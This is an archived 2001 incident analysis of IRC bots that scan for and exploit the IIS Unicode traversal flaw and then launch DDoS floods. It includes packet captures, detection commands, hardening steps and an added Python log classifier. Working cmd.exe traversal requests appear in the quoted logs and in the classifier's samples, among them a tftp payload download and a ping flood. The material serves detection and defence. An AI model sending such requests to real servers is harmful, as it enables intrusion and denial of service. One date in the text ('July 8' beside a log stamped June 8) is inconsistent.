  3 PRIVMSG #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 24

Eleven hours after they first discussed the scanning, the total is up
to 7106:

T 2001/06/06 11:32:30.030794 -> [AP]
  tatus: ][IP:][Port: 80][Found: 34]..:Scanner[128]!~Power
  :][Port: 80][Found: 67]..:Scanner[24]!~Power@XXXXXXXXXXX
  2][Port: 80][Found: 3580]..:Scanner[208]!~Power@ PRIVMSG
  #XXXXXX :[SCAN][Status: ][IP:][Port: 80][Found: 3425]..

Cleaned up, the hosts logged to be scanning from the at this time

XXXXXXXXXXXXXXXXXX [IP:][Port: 80][Found: 0]
XXXXXXXXXXXXXXXXXX [IP:][Port: 80][Found: 67]
XXXXXXXXXXXXXXXXXX [IP: ][Port: 80][Found: 3580]
XXXXXXXXXXXXXXXXXX [IP:][Port: 80][Found: 4080]

The total as of 11:32:29 is up to 7727. It is estimated that during
this period, responses (most failures or error messages) were received
from 388428 web servers off site. (It is not yet known how many
attempted connections were made.)

On July 8, 2001, a DDoS attack can be seen sourced from

T 2001/06/08 02:20:09.406262 -> [AP]
  GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"

I 2001/06/08 02:20:09.430676 -> 8:0 7303@0:1480

The following report was received on July 8:

Date: Sun, 8 Jul 2001 18:29:54 -0700 (PDT)
Message-Id: <200107090129.f691Tsa32678@site>
To: abuse@site
From: someone@othersite
Subject: attack

 . . .

Problem or question:
I believe a computer at your site was used to compromise a web
server located at ...

After reviewing the web server logs, I found the follow
repeated entry:

2001-07-06 09:28:18 - GET
/scripts/..\../winnt/system32/cmd.exe 200 - - -

A DNS lookup suggests that IP is a computer on the
XXXX's network. It appears that someone is exploiting a well-known
vulnerability in the IIS web server. The hacker was successful, as
some files were successfully uploaded to the machine (mirc32.exe).


The host reported to be scanning was scanning that IP range
( at the time (although it was not being logged), so this
likely does correlate:

XXXXXXXXXXXXXXXXX [IP: ][Port: 80][Found: 3580]

Successful exploitation of the Windows IIS Unicode vulnerability
during scanning results in a directory listing from the web server.
These look like the following (as seen using "ngrep"):

# ngrep -q -I "Volume in drive" | less

T -> [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Date: Fri, 06 Jul 2001 04:
  10:26 GMT..Content-Type: application/octet-stream..Volume in drive C h
  as no label...Volume Serial Number is 7C24-D411....

T -> [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Fri, 06 Jul 2001 06:
  50:58 GMT..Content-Type: application/octet-stream..Volume in drive C h
  as no label...Volume Serial Number is 047C-3309....

T -> [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Fri, 06 Jul 2001 07:
  06:49 GMT..Content-Type: application/octet-stream..Volume in drive C h
  as no label...Volume Serial Number is 0CFD-B8DA....

T -> [AP]
  HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Date: Fri, 06 Jul 2001 07:
  13:44 GMT..Content-Type: application/octet-stream..Volume in drive C h
  as no label...Volume Serial Number is CC72-B0EE....
 . . .

Using this signature, a count of the entries logged from traffic
to/from a limited subset of the known compromised systems results in a
count of 9106 off-site systems compromised:

# ngrep -q -I "Volume in drive" | grep " -> " |
 awk '{ print $2;}' | sed "s/:80//" | sort | uniq > exploited-iis
# wc -l exploited-iis
      9106 exploited-iis

The logs examined do not include traffic to/from two of four hosts
known to be scanning, so the 9106 figure is likely an undercount of
compromises resulting from scanning activity on these systems.

On July 10, XXXXX reported another DDoS attack, this time involving
44 systems. The target was XXXXXXXXXXXX, and the total outbound flow
rate exceeded 50 Mbps for over two hours.

In all, the following systems have been identified as scanning,
relaying IRC traffic, or involved in DDoS attacks:

     [71 hosts deleted]


CERT Advisory 2001-11 contains information on preventative measures:


In addition, XXXXXX relayed the following preventative measures for
IIS servers to pass along to administrators.

There are a couple of simple steps that NT admins should take that
will significantly increase the "degree of difficulty" in
compromising NT boxes - doing these things can at least reduce the
number of incidents we respond to:

1. On an IIS server, always change the location of the inetpub
directory and its subordinates (wwwroot, ftproot, etc.) from the
default (C:\InetPub) to a different logical partition. The "../.."
attack's syntax is not capable of changing drives to access

2. Restrict anonymous access to the registry. This greatly reduces
the amount of information available to a non-authenticated user about
the target system. To do this in Windows 2000:

   a. In Administrative Tools, open Local Security Policy.
   b. In the Tree Window, expand Local Policies and choose Security
   c. Double-click "Additional restrictions for anonymous connections".
   d. In the Local Policy Setting dropdown, choose "No access without
       explicit anonymous permissions".

In Windows NT 4, a registry hack needs to be applied:

   Value: REG_DWORD RestrictAnonymous = 1

There are some consequences to using the anonymous restrictions,
which mostly apply to Domain Controllers. Use of these settings on
DC's requires that the admin read up on them.

--
Dave Dittrich Computing & Communications
dittrich@cac.washington.edu University Computing Services
http://staff.washington.edu/dittrich University of Washington

PGP key http://staff.washington.edu/dittrich/pgpkey.txt
Fingerprint FE 97 0C 57 08 43 F3 EB 49 A1 0C D0 8E 0C D0 BE C8 38 CC B5

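Added example, not code from Dittrich's post or from the tools it names: a Python classifier that decodes the overlong-UTF-8 traversal (%c1%9c) seen in the web logs quoted above and sorts cmd.exe requests into the three uses the analysis describes (the scanner's "dir" probe, the tftp tool upload, and ping floods relayed through exploited IIS hosts). The sample log lines are constructed from the post's excerpts with documentation-range placeholder addresses.

```python
"""Classify IIS Unicode-traversal requests from web server log lines.

Constructed sample lines follow the two log formats quoted in the post
(Apache common log format and IIS W3C extended format); addresses are
documentation-range placeholders, not hosts from the incident.
"""
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

SAMPLE_LOGS = [
    # Scan probe: the "cmd.exe?/c+dir" request the reporting sites saw.
    '198.51.100.7 - - [06/Jul/2001:06:44:08 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"',
    # Tool upload step (IIS log: query is its own field, stem already decoded).
    '2001-07-02 21:39:14 198.51.100.7 80 GET /scripts/..\\../winnt/system32/cmd.exe /c+tftp.exe+"-i"+198.51.100.7+GET+nt.exe 502 -',
    # Flood relayed through a third party's IIS server (the bot's !packet command).
    '198.51.100.7 - - [07/Aug/2001:17:19:35 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+203.0.113.9+"-n"+7000+"-w"+0" 404 -',
    # Ordinary request, for comparison.
    '198.51.100.7 - - [06/Jul/2001:06:44:09 -0500] "GET /index.html HTTP/1.0" 200 1234',
]

REQUEST_RE = re.compile(r'GET\s+(\S+)(?:\s+(/c\S*))?')


def decode_path(raw):
    """Percent-decode RAW and turn overlong two-byte UTF-8 sequences into the
    ASCII character a vulnerable IIS decoder produced (%c1%9c -> '\\',
    %c0%af -> '/'). A lead byte of 0xC0/0xC1 can only encode U+0000..U+007F,
    which a strict decoder rejects; that leniency is the bug being exploited."""
    data = unquote_to_bytes(raw)
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def normalize(path):
    """Treat '\\' as '/', resolve '.' and '..' segments lexically, and report
    whether the request climbed above the web root."""
    parts, escaped = [], False
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            else:
                escaped = True
        else:
            parts.append(seg)
    return "/" + "/".join(parts), escaped


def parse_request(line):
    """Return (stem, query) for an Apache CLF or IIS W3C line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = m.group(1).rstrip('"')
    if "?" in target:
        return tuple(target.split("?", 1))
    return target, m.group(2) or ""


def classify(line):
    """Decode one log line and say what the traversal was used for."""
    req = parse_request(line)
    if req is None:
        return {"verdict": "not a GET request"}
    stem, query = req
    target, escaped = normalize(decode_path(stem))
    tokens = [t.strip('"') for t in decode_path(query).split("+") if t]
    if tokens and tokens[0].lower() == "/c":
        tokens = tokens[1:]  # drop cmd.exe's own /c switch
    result = {"target": target, "escaped_root": escaped, "tokens": tokens}
    cmd = tokens[0].lower() if tokens else ""
    if not escaped:
        result["verdict"] = "no traversal"
    elif not target.lower().endswith("/winnt/system32/cmd.exe"):
        result["verdict"] = "traversal outside web root"
    elif cmd == "dir":
        result["verdict"] = "unicode traversal: directory probe (scanner, bot !scan)"
    elif cmd in ("tftp", "tftp.exe"):
        result["verdict"] = "unicode traversal: tool upload via tftp"
    elif cmd in ("ping", "ping.exe") and "-v" in (t.lower() for t in tokens):
        result["verdict"] = "unicode traversal: ping flood relay (bot !packet/!dos)"
    else:
        result["verdict"] = "unicode traversal: command execution"
    return result


def summarize(lines):
    """Count verdicts over a batch of log lines."""
    return Counter(classify(l)["verdict"] for l in lines)


if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(classify(line)["verdict"])
    print(summarize(SAMPLE_LOGS))
```

The same decoder also catches the %c0%af spelling of the traversal, so a log filter built on it does not depend on one particular encoding of the separator.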


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
